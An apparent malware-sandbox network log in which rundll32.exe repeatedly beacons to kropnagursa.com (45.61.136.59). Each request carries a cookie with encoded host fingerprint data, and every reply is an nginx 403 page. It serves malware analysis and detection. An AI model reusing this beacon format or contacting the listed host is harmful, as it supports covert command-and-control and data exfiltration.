                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            267192.168.2.44996345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:38.248667002 CET2449OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:38.414350033 CET2449INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            268192.168.2.44996445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:38.721204996 CET2450OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:38.885795116 CET2450INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            269192.168.2.44996545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:39.324625015 CET2451OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:39.489595890 CET2452INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            27192.168.2.44972345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:15.702981949 CET2142OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:15.871002913 CET2142INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            270192.168.2.44996645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:39.826447964 CET2453OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:39.991018057 CET2453INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            271192.168.2.44996745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:40.304939985 CET2454OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:40.472965956 CET2454INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            272192.168.2.44996845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:40.780384064 CET2455OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:40.945648909 CET2455INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            273192.168.2.44996945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:41.252970934 CET2456OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:41.420913935 CET2457INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            274192.168.2.44997045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:41.727977037 CET2458OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:41.892359018 CET2458INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            275192.168.2.44997145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:42.216540098 CET2459OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:42.390408039 CET2459INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            276192.168.2.44997245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:42.872539043 CET2460OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:43.037337065 CET2460INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            277192.168.2.44997345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:43.346694946 CET2461OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:43.511570930 CET2462INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            278192.168.2.44997445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:43.842569113 CET2463OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:44.007224083 CET2463INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            279192.168.2.44997545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:44.321190119 CET2464OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:44.489001036 CET2464INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            28192.168.2.44972445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:16.235322952 CET2143OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:16.400310040 CET2143INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            280192.168.2.44997645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:44.801465988 CET2465OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:44.968884945 CET2466INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
